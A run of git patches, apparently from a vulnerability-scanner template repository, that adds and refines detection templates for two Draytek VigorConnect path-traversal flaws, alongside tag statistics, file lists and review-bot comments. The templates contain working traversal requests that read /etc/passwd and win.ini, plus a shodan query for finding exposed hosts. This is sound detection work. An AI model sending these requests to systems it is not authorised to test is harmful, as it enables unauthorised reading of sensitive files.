| | | | | | +| phpunit | 1 | | | | | | | | | +| spip | 1 | | | | | | | | | +| nps | 1 | | | | | | | | | +| hiboss | 1 | | | | | | | | | +| dropbox | 1 | | | | | | | | | +| myanimelist | 1 | | | | | | | | | +| synnefo | 1 | | | | | | | | | +| sar2html | 1 | | | | | | | | | +| esxi | 1 | | | | | | | | | +| xiuno | 1 | | | | | | | | | +| workresources | 1 | | | | | | | | | +| stem | 1 | | | | | | | | | +| faraday | 1 | | | | | | | | | +| addpac | 1 | | | | | | | | | +| oidc | 1 | | | | | | | | | +| shopxo | 1 | | | | | | | | | +| ncomputing | 1 | | | | | | | | | +| icinga | 1 | | | | | | | | | +| apple | 1 | | | | | | | | | +| keenetic | 1 | | | | | | | | | +| darkstat | 1 | | | | | | | | | +| zentral | 1 | | | | | | | | | +| sonarcloud | 1 | | | | | | | | | +| omi | 1 | | | | | | | | | +| blueiris | 1 | | | | | | | | | +| fastly | 1 | | | | | | | | | +| saltapi | 1 | | | | | | | | | +| dompdf | 1 | | | | | | | | | +| postmark | 1 | | | | | | | | | +| newrelic | 1 | | | | | | | | | +| snipeit | 1 | | | | | | | | | +| flexbe | 1 | | | | | | | | | +| eyesofnetwork | 1 | | | | | | | | | +| mdm | 1 | | | | | | | | | +| slocum | 1 | | | | | | | | | +| delta | 1 | | | | | | | | | +| tor | 1 | | | | | | | | | +| thinkadmin | 1 | | | | | | | | | +| box | 1 | | | | | | | | | +| strava | 1 | | | | | | | | | +| details | 1 | | | | | | | | | +| formalms | 1 | | | | | | | | | +| wmt | 1 | | | | | | | | | +| xmlchart | 1 | | | | | | | | | +| opensearch | 1 | | | | | | | | | +| trello | 1 | | | | | | | | | +| mx | 1 | | | | | | | | | +| h3c | 1 | | | | | | | | | +| iconfinder | 1 | | | | | | | | | +| cname | 1 | | | | | | | | | +| sofneta | 1 | | | | | | | | | +| starttls | 1 | | | | | | | | | +| asus | 1 | | | | | | | | | +| franklinfueling | 1 | | | | | | | | | +| exponentcms | 1 | | | | | | | | | +| nweb2fax | 1 | | | | | | | | | +| superwebmailer | 1 | | | | | | | | | +| alertmanager | 1 | | | | | | | | | +| wowza | 1 | | | | | | | | | +| revslider | 1 | | | | | | | | | +| sage 
| 1 | | | | | | | | | +| tamronos | 1 | | | | | | | | | +| lotuscms | 1 | | | | | | | | | +| siteomat | 1 | | | | | | | | | +| issabel | 1 | | | | | | | | | +| tuxedo | 1 | | | | | | | | | +| solarlog | 1 | | | | | | | | | +| smartsense | 1 | | | | | | | | | +| zoneminder | 1 | | | | | | | | | +| b2bbuilder | 1 | | | | | | | | | +| ssltls | 1 | | | | | | | | | +| dahua | 1 | | | | | | | | | +| pods | 1 | | | | | | | | | +| concourse | 1 | | | | | | | | | +| smartsheet | 1 | | | | | | | | | +| workspace | 1 | | | | | | | | | +| softaculous | 1 | | | | | | | | | +| biqsdrive | 1 | | | | | | | | | +| particle | 1 | | | | | | | | | +| argussurveillance | 1 | | | | | | | | | +| checkmarx | 1 | | | | | | | | | +| holidayapi | 1 | | | | | | | | | +| fleet | 1 | | | | | | | | | +| cve2004 | 1 | | | | | | | | | +| knowage | 1 | | | | | | | | | +| sunflower | 1 | | | | | | | | | +| clockwatch | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| speed | 1 | | | | | | | | | +| ignition | 1 | | | | | | | | | +| feedwordpress | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| incapptic-connect | 1 | | | | | | | | | +| shopware | 1 | | | | | | | | | +| aerohive | 1 | | | | | | | | | +| doh | 1 | | | | | | | | | +| commscope | 1 | | | | | | | | | +| apcu | 1 | | | | | | | | | +| fhem | 1 | | | | | | | | | +| ecsimagingpacs | 1 | | | | | | | | | +| nimble | 1 | | | | | | | | | +| nomad | 1 | | | | | | | | | +| edgeos | 1 | | | | | | | | | +| malshare | 1 | | | | | | | | | +| oauth2 | 1 | | | | | | | | | +| qdpm | 1 | | | | | | | | | +| mediumish | 1 | | | | | | | | | +| flask | 1 | | | | | | | | | +| siemens | 1 | | | | | | | | | +| unisharp | 1 | | | | | | | | | +| dicoogle | 1 | | | | | | | | | +| kvm | 1 | | | | | | | | | +| ncbi | 1 | | | | | | | | | +| nc2 | 1 | | | | | | | | | +| adafruit | 1 | | | | | | | | | +| ebird | 1 | | | | | | | | | +| purestorage | 1 | | | | | | | | | +| bookstack | 1 | | | | | | | | | +| idera | 1 | | | | | | | | | +| wing-ftp | 1 | | | | | | 
| | | +| eyelock | 1 | | | | | | | | | +| ldap | 1 | | | | | | | | | +| struts2 | 1 | | | | | | | | | +| tarantella | 1 | | | | | | | | | +| fiori | 1 | | | | | | | | | +| luftguitar | 1 | | | | | | | | | +| optiLink | 1 | | | | | | | | | +| sast | 1 | | | | | | | | | +| htmli | 1 | | | | | | | | | +| dvr | 1 | | | | | | | | | +| bazarr | 1 | | | | | | | | | +| sitefinity | 1 | | | | | | | | | +| formcraft3 | 1 | | | | | | | | | +| webmodule-ee | 1 | | | | | | | | | +| api-manager | 1 | | | | | | | | | +| spectracom | 1 | | | | | | | | | +| webui | 1 | | | | | | | | | +| short.io | 1 | | | | | | | | | +| coinlayer | 1 | | | | | | | | | +| mappress | 1 | | | | | | | | | +| roundcube | 1 | | | | | | | | | +| blockfrost | 1 | | | | | | | | | +| rudloff | 1 | | | | | | | | | +| dotnet | 1 | | | | | | | | | +| ecosys | 1 | | | | | | | | | +| yopass | 1 | | | | | | | | | +| ecom | 1 | | | | | | | | | +| nearby | 1 | | | | | | | | | +| threatq | 1 | | | | | | | | | +| sprintful | 1 | | | | | | | | | +| acsoft | 1 | | | | | | | | | +| wazuh | 1 | | | | | | | | | +| centreon | 1 | | | | | | | | | +| portal | 1 | | | | | | | | | +| imap | 1 | | | | | | | | | +| wordcloud | 1 | | | | | | | | | +| aura | 1 | | | | | | | | | +| blackboard | 1 | | | | | | | | | +| okiko | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 07b8f2d2b1..98ed1f88da 100644 --- a/TOP-10.md +++ b/TOP-10.md 
@@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 1150 | daffainfo | 560 | cves | 1154 | info | 1183 | http | 3164 | -| panel | 513 | dhiyaneshdk | 421 | exposed-panels | 519 | high | 870 | file | 68 | -| lfi | 460 | pikpikcu | 316 | vulnerabilities | 446 | medium | 658 | network | 50 | -| xss | 363 | pdteam | 262 | technologies | 251 | critical | 411 | dns | 17 | -| wordpress | 358 | geeknik | 178 | exposures | 203 | low | 180 | | | -| exposure | 292 | dwisiswant0 | 168 | misconfiguration | 196 | unknown | 6 | | | -| rce | 289 | princechaddha | 130 | workflows | 186 | | | | | -| cve2021 | 283 | 0x_akoko | 129 | token-spray | 153 | | | | | -| tech | 265 | gy741 | 117 | default-logins | 95 | | | | | -| wp-plugin | 259 | pussycat0x | 116 | file | 68 | | | | | +| cve | 1156 | daffainfo | 560 | cves | 1160 | info | 1192 | http | 3187 | +| panel | 515 | dhiyaneshdk | 421 | exposed-panels | 523 | high | 874 | file | 68 | +| lfi | 461 | pikpikcu | 316 | vulnerabilities | 452 | medium | 662 | network | 50 | +| xss | 367 | pdteam | 262 | technologies | 255 | critical | 414 | dns | 17 | +| wordpress | 364 | geeknik | 179 | exposures | 204 | low | 183 | | | +| exposure | 293 | dwisiswant0 | 168 | misconfiguration | 197 | unknown | 6 | | | +| rce | 291 | princechaddha | 133 | workflows | 186 | | | | | +| cve2021 | 283 | 0x_akoko | 130 | token-spray | 154 | | | | | +| tech | 271 | gy741 | 118 | default-logins | 95 | | | | | +| wp-plugin | 264 | pussycat0x | 116 | file | 68 | | | | | From 46ccee2102434cac039e861773bef2a3badf41b3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 13 May 2022 09:00:48 +0000 Subject: [PATCH 15/68] Auto README Update [Fri May 13 09:00:48 UTC 2022] :robot: --- README.md | 22 +++++++++++----------- 1 file changed, 11 insertions(+), 11 deletions(-) 
diff --git a/README.md b/README.md index da6f508012..8026d4b3ab 100644 --- a/README.md +++ b/README.md @@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 1150 | daffainfo | 560 | cves | 1154 | info | 1183 | http | 3164 | -| panel | 513 | dhiyaneshdk | 421 | exposed-panels | 519 | high | 870 | file | 68 | -| lfi | 460 | pikpikcu | 316 | vulnerabilities | 446 | medium | 658 | network | 50 | -| xss | 363 | pdteam | 262 | technologies | 251 | critical | 411 | dns | 17 | -| wordpress | 358 | geeknik | 178 | exposures | 203 | low | 180 | | | -| exposure | 292 | dwisiswant0 | 168 | misconfiguration | 196 | unknown | 6 | | | -| rce | 289 | princechaddha | 130 | workflows | 186 | | | | | -| cve2021 | 283 | 0x_akoko | 129 | token-spray | 153 | | | | | -| tech | 265 | gy741 | 117 | default-logins | 95 | | | | | -| wp-plugin | 259 | pussycat0x | 116 | file | 68 | | | | | +| cve | 1156 | daffainfo | 560 | cves | 1160 | info | 1192 | http | 3187 | +| panel | 515 | dhiyaneshdk | 421 | exposed-panels | 523 | high | 874 | file | 68 | +| lfi | 461 | pikpikcu | 316 | vulnerabilities | 452 | medium | 662 | network | 50 | +| xss | 367 | pdteam | 262 | technologies | 255 | critical | 414 | dns | 17 | +| wordpress | 364 | geeknik | 179 | exposures | 204 | low | 183 | | | +| exposure | 293 | dwisiswant0 | 168 | misconfiguration | 197 | unknown | 6 | | | +| rce | 291 | princechaddha | 133 | workflows | 186 | | | | | +| cve2021 | 283 | 0x_akoko | 130 | token-spray | 154 | | | | | +| tech | 271 | gy741 | 118 | default-logins | 95 | | | | | +| wp-plugin | 264 | pussycat0x | 116 | file | 68 | | | | | -**260 directories, 3520 files**. +**261 directories, 3543 files**. From 2623f06714fb2d2d9b3e2952d6dd7f129e3c7424 Mon Sep 17 00:00:00 2001 
From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com>
Date: Fri, 13 May 2022 18:07:02 +0900
Subject: [PATCH 16/68] Create CVE-2021-20124.yaml
---
CVE-2021-20124.yaml | 35 +++++++++++++++++++++++++++++++++++
1 file changed, 35 insertions(+)
create mode 100644 CVE-2021-20124.yaml
diff --git a/CVE-2021-20124.yaml b/CVE-2021-20124.yaml
new file mode 100644
index 0000000000..83e0c0386a
--- /dev/null
+++ b/CVE-2021-20124.yaml
@@ -0,0 +1,35 @@
+id: CVE-2021-20124
+
+info:
+ name: Draytek VigorConnect - Unauthenticated Local File Inclusion WebServlet
+ author: 0x_Akoko
+ severity: high
+ description: A local file inclusion vulnerability exists in Draytek VigorConnect 1.6.0-B3 in the file download functionality of the WebServlet endpoint. An unauthenticated attacker could leverage this vulnerability to download arbitrary files from the underlying operating system with root privileges.
+ reference:
+ - https://www.tenable.com/security/research/tra-2021-42
+ - https://www.cvedetails.com/cve/CVE-2021-20124
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2021-20124
+ cwe-id: CWE-22
+ tags: cve,cve2021,draytek,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../etc/passwd"
+ - "{{BaseURL}}/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../windows/win.ini"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - "for 16-bit app support"
+ condition: or
+
+ - type: status
+ status:
+ - 200
From 69d72179dbf87cec4a50bfb6e09d5799d9bdcefe Mon Sep 17 00:00:00 2001
From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com>
Date: Fri, 13 May 2022 18:07:21 +0900
Subject: [PATCH 17/68] Create CVE-2021-20123.yaml
---
CVE-2021-20123.yaml | 35 +++++++++++++++++++++++++++++++++++
1 file changed, 35 insertions(+)
create mode 100644 CVE-2021-20123.yaml
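Review bot: The `requests` block in CVE-2021-20124.yaml lists two traversal paths but has no `stop-at-first-match: true`, so the `win.ini` request is still sent to a host that already matched on `/etc/passwd`; add `stop-at-first-match: true` above `matchers-condition: and`. The only content check is the body regex plus a 200 status, so any 200 page that happens to contain `for 16-bit app support` or a `root:...:0:0:` line is reported as vulnerable; a third matcher on a response header the download endpoint is expected to set would cut false positives (which header that is cannot be told from this hunk). The file is also created at the repository root, whereas the other CVE templates in this series sit under `cves/<year>/`. The same points apply to `CVE-2021-20123.yaml` in PATCH 17.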
diff --git a/CVE-2021-20123.yaml b/CVE-2021-20123.yaml
new file mode 100644
index 0000000000..f9e9b8b2ca
--- /dev/null
+++ b/CVE-2021-20123.yaml
@@ -0,0 +1,35 @@
+id: CVE-2021-20123
+
+info:
+ name: Draytek VigorConnect - Unauthenticated Local File Inclusion DownloadFileServlet
+ author: 0x_Akoko
+ severity: high
+ description: A local file inclusion vulnerability exists in Draytek VigorConnect 1.6.0-B3 in the file download functionality of the DownloadFileServlet endpoint. An unauthenticated attacker could leverage this vulnerability to download arbitrary files from the underlying operating system with root privileges.
+ reference:
+ - https://www.tenable.com/security/research/tra-2021-42
+ - https://www.cvedetails.com/cve/CVE-2021-20123/
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2021-20123
+ cwe-id: CWE-22
+ tags: cve,cve2021,draytek,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/ACSServer/DownloadFileServlet?show_file_name=../../../../../../etc/passwd&type=uploadfile&path=anything"
+ - "{{BaseURL}}/ACSServer/DownloadFileServlet?show_file_name=../../../../../../windows/win.ini&type=uploadfile&path=anything"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - "for 16-bit app support"
+ condition: or
+
+ - type: status
+ status:
+ - 200
From c6f34b351b73cb3588cea4bfdb0950af8ed32c9c Mon Sep 17 00:00:00 2001
From: Prince Chaddha Date: Fri, 13 May 2022 15:25:01 +0530
Subject: [PATCH 18/68] Update and rename CVE-2021-20123.yaml to cves/2021/CVE-2021-20123.yaml
---
.../2021/CVE-2021-20123.yaml | 15 ++++++++++++---
1 file changed, 12 insertions(+), 3 deletions(-)
rename CVE-2021-20123.yaml => cves/2021/CVE-2021-20123.yaml (62%)
diff --git a/CVE-2021-20123.yaml b/cves/2021/CVE-2021-20123.yaml
similarity index 62%
rename from CVE-2021-20123.yaml
rename to cves/2021/CVE-2021-20123.yaml
index f9e9b8b2ca..4f7029d7fc 100644
--- a/CVE-2021-20123.yaml
+++ b/cves/2021/CVE-2021-20123.yaml @@ -4,7 +4,8 @@ info: name: Draytek VigorConnect - Unauthenticated Local File Inclusion DownloadFileServlet author: 0x_Akoko severity: high - description: A local file inclusion vulnerability exists in Draytek VigorConnect 1.6.0-B3 in the file download functionality of the DownloadFileServlet endpoint. An unauthenticated attacker could leverage this vulnerability to download arbitrary files from the underlying operating system with root privileges. + description: | + A local file inclusion vulnerability exists in Draytek VigorConnect 1.6.0-B3 in the file download functionality of the DownloadFileServlet endpoint. An unauthenticated attacker could leverage this vulnerability to download arbitrary files from the underlying operating system with root privileges. reference: - https://www.tenable.com/security/research/tra-2021-42 - https://www.cvedetails.com/cve/CVE-2021-20123/ @@ -13,7 +14,10 @@ info: cvss-score: 7.5 cve-id: CVE-2021-20123 cwe-id: CWE-22 - tags: cve,cve2021,draytek,lfi + metadata: + verified: true + shodan-query: http.html:"VigorConnect" + tags: cve,cve2021,draytek,lfi,vigorconnect requests: - method: GET @@ -21,15 +25,20 @@ requests: - "{{BaseURL}}/ACSServer/DownloadFileServlet?show_file_name=../../../../../../etc/passwd&type=uploadfile&path=anything" - "{{BaseURL}}/ACSServer/DownloadFileServlet?show_file_name=../../../../../../windows/win.ini&type=uploadfile&path=anything" + stop-at-first-match: true matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" - "for 16-bit app support" condition: or + - type: word + part: header + words: + - "application/octet-stream" + - type: status status: - 200 From 1f24834a1b6a9abc235d18685642081dbd489c90 Mon Sep 17 00:00:00 2001 
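Review bot: The regex matcher in the last hunk still relies on the default `part`, while the word matcher added next to it states `part: header`; write `part: body` on the regex so the three matchers read the same way and the intended scope is explicit. The description was switched to a `|` block scalar, which keeps a trailing newline in the value; `description: |-` avoids that. PATCH 20 makes the same matcher change to `cves/2021/CVE-2021-20124.yaml`, so the `part: body` point applies there too.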
From: GitHub Action Date: Fri, 13 May 2022 09:57:41 +0000 Subject: [PATCH 19/68] Auto Generated New Template Addition List [Fri May 13 09:57:41 UTC 2022] :robot: --- .new-additions | 24 +----------------------- 1 file changed, 1 insertion(+), 23 deletions(-) diff --git a/.new-additions b/.new-additions index 81bcfa9f90..ecf3c1ca3b 100644 --- a/.new-additions +++ b/.new-additions @@ -1,23 +1 @@ -cves/2018/CVE-2018-19326.yaml -cves/2020/CVE-2020-36510.yaml -cves/2022/CVE-2022-1040.yaml -cves/2022/CVE-2022-1221.yaml -cves/2022/CVE-2022-29548.yaml -cves/2022/CVE-2022-30525.yaml -exposed-panels/privx-panel.yaml -exposed-panels/umbraco-login.yaml -exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml -exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml -exposures/configs/msmtp-config.yaml -misconfiguration/unauthorized-h3csecparh-login.yaml -technologies/cloudflare-nginx-detect.yaml -technologies/dedecms-detect.yaml -technologies/ecology-detect.yaml -technologies/jspxcms-detect.yaml -token-spray/api-moonpay.yaml -vulnerabilities/other/ecsimagingpacs-rce.yaml -vulnerabilities/other/gnuboard-sms-xss.yaml -vulnerabilities/wordpress/age-gate-open-redirect.yaml -vulnerabilities/wordpress/newsletter-manager-open-redirect.yaml -vulnerabilities/wordpress/wp-security-open-redirect.yaml -vulnerabilities/wordpress/wp-under-construction-ssrf.yaml +cves/2021/CVE-2021-20123.yaml From 0481125ecbf3f0d24a5b766dfb33db9a61db2efb Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 13 May 2022 15:35:36 +0530 Subject: [PATCH 20/68] Update and rename CVE-2021-20124.yaml to cves/2021/CVE-2021-20124.yaml --- .../2021/CVE-2021-20124.yaml | 13 +++++++++++-- 1 file changed, 11 insertions(+), 2 deletions(-) rename CVE-2021-20124.yaml => cves/2021/CVE-2021-20124.yaml (80%) diff --git a/CVE-2021-20124.yaml b/cves/2021/CVE-2021-20124.yaml similarity index 80% rename from CVE-2021-20124.yaml rename to cves/2021/CVE-2021-20124.yaml index 83e0c0386a..28d24c9763 100644 --- a/CVE-2021-20124.yaml 
+++ b/cves/2021/CVE-2021-20124.yaml @@ -7,13 +7,17 @@ info: description: A local file inclusion vulnerability exists in Draytek VigorConnect 1.6.0-B3 in the file download functionality of the WebServlet endpoint. An unauthenticated attacker could leverage this vulnerability to download arbitrary files from the underlying operating system with root privileges. reference: - https://www.tenable.com/security/research/tra-2021-42 + - https://www.draytek.com/products/vigorconnect/ - https://www.cvedetails.com/cve/CVE-2021-20124 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-20124 cwe-id: CWE-22 - tags: cve,cve2021,draytek,lfi + metadata: + verified: true + shodan-query: http.html:"VigorConnect" + tags: cve,cve2021,draytek,lfi,vigorconnect requests: - method: GET @@ -21,15 +25,20 @@ requests: - "{{BaseURL}}/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../etc/passwd" - "{{BaseURL}}/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../windows/win.ini" + stop-at-first-match: true matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" - "for 16-bit app support" condition: or + - type: word + part: header + words: + - "application/octet-stream" + - type: status status: - 200 From a3fbef4bfc2fa27f59b23013b8507a1dc531a9ca Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 13 May 2022 13:05:10 +0000 Subject: [PATCH 21/68] Auto Generated New Template Addition List [Fri May 13 13:05:10 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index ecf3c1ca3b..f054a196e8 100644 --- a/.new-additions +++ b/.new-additions @@ -1 +1,2 @@ cves/2021/CVE-2021-20123.yaml +cves/2021/CVE-2021-20124.yaml From bdf23f23242fe6c7d4b0724f557544a8956dc5bd Mon Sep 17 00:00:00 2001 
From: geeknik <466878+geeknik@users.noreply.github.com> Date: Fri, 13 May 2022 15:14:37 -0500 Subject: [PATCH 22/68] Update api-loqate.yaml fix false positive. --- token-spray/api-loqate.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/token-spray/api-loqate.yaml b/token-spray/api-loqate.yaml index 5588a1d2e8..7ebd015c07 100644 --- a/token-spray/api-loqate.yaml +++ b/token-spray/api-loqate.yaml @@ -20,3 +20,5 @@ requests: negative: true words: - 'Unknown key' + - 'Forbidden' + condition: or From 581b7a627bbf2969723989fda856c21a117e8c2a Mon Sep 17 00:00:00 2001 
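Review bot: The added `- 'Forbidden'` entry is a bare substring inside a negative word matcher, so any otherwise valid response that happens to contain that word is now discarded as well. If the API signals a rejected key with an HTTP 403, a status matcher would be a more precise way to exclude it than a word in the response text; the matcher's `part` and the rest of the request are outside this hunk, so that needs checking against the full template. `condition: or` is already the default for a word list, so that line only documents intent.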
From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Fri, 13 May 2022 16:26:43 -0400 Subject: [PATCH 23/68] Dashboard Content Enhancements (#4381) Dashboard Content Enhancements --- cnvd/2019/CNVD-2019-19299.yaml | 9 ++++++++- cnvd/2019/CNVD-2019-32204.yaml | 10 ++++++++-- cnvd/2020/CNVD-2020-62422.yaml | 4 ++-- cnvd/2020/CNVD-2020-68596.yaml | 11 +++++++++-- cnvd/2021/CNVD-2021-01931.yaml | 2 +- cnvd/2021/CNVD-2021-09650.yaml | 9 ++++++++- cnvd/2021/CNVD-2021-26422.yaml | 7 +++++++ cnvd/2021/CNVD-2021-28277.yaml | 4 ++-- cnvd/2022/CNVD-2022-03672.yaml | 9 ++++++++- cves/2007/CVE-2007-4504.yaml | 4 ++-- cves/2010/CVE-2010-0696.yaml | 3 ++- cves/2010/CVE-2010-2122.yaml | 4 ++-- cves/2010/CVE-2010-3203.yaml | 2 +- cves/2015/CVE-2015-4694.yaml | 4 ++-- cves/2017/CVE-2017-11512.yaml | 4 ++-- cves/2017/CVE-2017-15363.yaml | 2 +- cves/2017/CVE-2017-7269.yaml | 2 +- cves/2017/CVE-2017-7615.yaml | 2 +- cves/2017/CVE-2017-9841.yaml | 7 +++++-- cves/2018/CVE-2018-0127.yaml | 7 +++++-- cves/2018/CVE-2018-1000226.yaml | 5 ++++- cves/2018/CVE-2018-1000861.yaml | 8 +++++--- cves/2018/CVE-2018-10562.yaml | 6 ++++-- cves/2018/CVE-2018-12031.yaml | 6 ++++-- cves/2018/CVE-2018-1207.yaml | 12 ++++++------ cves/2018/CVE-2018-12300.yaml | 2 +- cves/2018/CVE-2018-12634.yaml | 7 +++++-- cves/2018/CVE-2018-1273.yaml | 4 +++- cves/2018/CVE-2018-13379.yaml | 8 +++++--- cves/2018/CVE-2018-13980.yaml | 2 +- cves/2018/CVE-2018-14064.yaml | 4 +++- cves/2018/CVE-2018-14916.yaml | 6 ++++-- cves/2018/CVE-2018-15517.yaml | 4 ++-- cves/2018/CVE-2018-16167.yaml | 4 +++- cves/2018/CVE-2018-16763.yaml | 7 +++++-- cves/2018/CVE-2018-16836.yaml | 8 +++++--- cves/2018/CVE-2018-17246.yaml | 9 +++++---- cves/2018/CVE-2018-17431.yaml | 9 ++++++--- cves/2018/CVE-2018-18925.yaml | 9 +++++---- cves/2018/CVE-2018-20985.yaml | 9 ++++++--- cves/2018/CVE-2018-2894.yaml | 8 ++++++-- cves/2018/CVE-2018-3810.yaml | 10 ++++++---- cves/2018/CVE-2018-6008.yaml | 4 ++-- 
cves/2018/CVE-2018-7600.yaml | 8 +++++--- cves/2018/CVE-2018-7602.yaml | 7 ++++--- cves/2018/CVE-2018-7662.yaml | 2 +- cves/2018/CVE-2018-9161.yaml | 5 +++-- cves/2018/CVE-2018-9205.yaml | 2 +- cves/2019/CVE-2019-16123.yaml | 2 +- cves/2019/CVE-2019-16759.yaml | 2 +- cves/2019/CVE-2019-17506.yaml | 5 ++--- cves/2019/CVE-2019-19908.yaml | 4 ++-- cves/2019/CVE-2019-19985.yaml | 6 +++--- cves/2019/CVE-2019-20141.yaml | 4 ++-- cves/2019/CVE-2019-3912.yaml | 2 +- cves/2019/CVE-2019-9955.yaml | 2 +- cves/2020/CVE-2020-18268.yaml | 2 +- cves/2020/CVE-2020-22840.yaml | 2 +- cves/2020/CVE-2020-24391.yaml | 5 ++--- cves/2020/CVE-2020-24550.yaml | 2 +- cves/2020/CVE-2020-24579.yaml | 2 +- cves/2020/CVE-2020-25495.yaml | 4 ++-- cves/2020/CVE-2020-29453.yaml | 2 +- cves/2020/CVE-2020-3452.yaml | 2 +- cves/2020/CVE-2020-35736.yaml | 6 +++--- cves/2020/CVE-2020-35749.yaml | 2 +- cves/2020/CVE-2020-36365.yaml | 2 +- cves/2020/CVE-2020-36510.yaml | 2 +- cves/2020/CVE-2020-9054.yaml | 4 ++-- cves/2020/CVE-2020-9490.yaml | 5 ++--- cves/2021/CVE-2021-21816.yaml | 4 ++-- cves/2021/CVE-2021-24997.yaml | 7 +++---- cves/2021/CVE-2021-25118.yaml | 2 +- cves/2021/CVE-2021-30151.yaml | 4 ++-- cves/2021/CVE-2021-39316.yaml | 7 +++---- cves/2021/CVE-2021-41293.yaml | 2 +- cves/2022/CVE-2022-0540.yaml | 2 +- cves/2022/CVE-2022-1119.yaml | 4 ++-- cves/2022/CVE-2022-1221.yaml | 4 +++- exposed-panels/gogs-login.yaml | 2 +- exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml | 2 +- exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml | 2 +- exposures/files/gogs-install-exposure.yaml | 2 +- headless/window-name-domxss.yaml | 2 +- misconfiguration/aem/aem-setpreferences-xss.yaml | 4 ++-- misconfiguration/akamai-arl-xss.yaml | 4 ++-- misconfiguration/ampps-dirlisting.yaml | 2 +- misconfiguration/d-link-arbitary-fileread.yaml | 2 +- vulnerabilities/moodle/moodle-filter-jmol-xss.yaml | 4 ++-- vulnerabilities/moodle/moodle-xss.yaml | 2 +- vulnerabilities/netsweeper/netsweeper-rxss.yaml | 2 +- 
vulnerabilities/oracle/oracle-ebs-xss.yaml | 2 +- vulnerabilities/other/bems-api-lfi.yaml | 4 ++-- vulnerabilities/other/ecsimagingpacs-rce.yaml | 8 ++++++-- vulnerabilities/other/eyelock-nano-lfd.yaml | 4 ++-- vulnerabilities/other/java-melody-xss.yaml | 2 +- vulnerabilities/other/kafdrop-xss.yaml | 4 ++-- vulnerabilities/other/kyocera-m2035dn-lfi.yaml | 4 ++-- vulnerabilities/other/microstrategy-ssrf.yaml | 4 ++-- vulnerabilities/other/nginx-module-vts-xss.yaml | 2 +- vulnerabilities/other/nuuo-file-inclusion.yaml | 2 +- vulnerabilities/other/odoo-cms-redirect.yaml | 5 +++-- vulnerabilities/other/oliver-library-lfi.yaml | 4 ++-- .../other/pbootcms-database-file-download.yaml | 2 +- vulnerabilities/other/pmb-directory-traversal.yaml | 4 ++-- vulnerabilities/other/pmb-local-file-disclosure.yaml | 2 +- vulnerabilities/other/wems-manager-xss.yaml | 4 ++-- .../wordpress/admin-word-count-column-lfi.yaml | 2 +- vulnerabilities/wordpress/aspose-file-download.yaml | 4 ++-- .../wordpress/aspose-ie-file-download.yaml | 4 ++-- .../wordpress/aspose-pdf-file-download.yaml | 4 ++-- .../wordpress/aspose-words-file-download.yaml | 4 ++-- vulnerabilities/wordpress/cherry-file-download.yaml | 5 ++--- vulnerabilities/wordpress/diarise-theme-lfi.yaml | 4 ++-- .../wordpress/flow-flow-social-stream-xss.yaml | 2 +- vulnerabilities/wordpress/hb-audio-lfi.yaml | 2 +- .../wordpress/nativechurch-wp-theme-lfd.yaml | 4 ++-- vulnerabilities/wordpress/sniplets-xss.yaml | 2 +- .../wordpress/wordpress-wordfence-lfi.yaml | 2 +- .../wordpress-wordfence-waf-bypass-xss.yaml | 2 +- .../wordpress/wordpress-zebra-form-xss.yaml | 4 ++-- vulnerabilities/wordpress/wp-code-snippets-xss.yaml | 2 +- .../wordpress/wp-full-path-disclosure.yaml | 3 ++- vulnerabilities/wordpress/wp-haberadam-idor.yaml | 2 +- vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml | 6 +++--- .../wordpress/wp-revslider-file-download.yaml | 4 ++-- .../wordpress/wp-woocommerce-file-download.yaml | 2 +- workflows/gogs-workflow.yaml | 2 +- 
